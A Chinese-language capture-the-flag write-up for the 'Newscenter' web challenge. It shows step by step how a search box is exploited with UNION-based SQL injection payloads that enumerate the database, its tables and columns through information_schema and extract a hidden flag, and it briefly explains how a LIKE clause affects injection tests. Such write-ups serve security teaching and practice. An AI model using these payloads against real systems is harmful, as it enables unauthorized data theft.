攻防世界-Web-Newscenter
0x01
打开题目看到一个网页,里面只有一个搜索输入框是我们可以控制的,所以猜测可能是SQL注入。尝试123asdqwe' or 1=1#发现能够查询出所有新闻。
继续尝试' union select 1,2,3#,验证select查询了三个字段:
0x02
已经可以判定是联合注入,接下来就简单了。
查询当前数据库
1' union select 1,2,database()#,得到数据库为news
查询当前库中的表
1' union select 1,table_name,3 from information_schema.tables where table_schema='news'#获得两个表名:news和secret_table
查询表中的列
猜测flag极有可能在secret_table里面,下面就查询其中的列名:1' union select 1,column_name,3 from information_schema.columns where table_name='secret_table'#得到列名有fl4g
查询flag列的值
1' union select 1,fl4g,3 from secret_table#获取flag
备注
该题是POST类型的注入。当我在测试SQL注入漏洞时使用了常用的1' and '1'='1发现并不能验证漏洞。这里我猜测可能是题目中使用了like来限定条件而不是等号。
如果输入是1,那么后端拼接完成的语句可能是like '%1%',这样就会找出含有1的内容,而我输入1' and '1'='1就会被拼接成like '%1' and '1'='1%1'显然是不成立搜不出任何东西。然而用or就可以验证。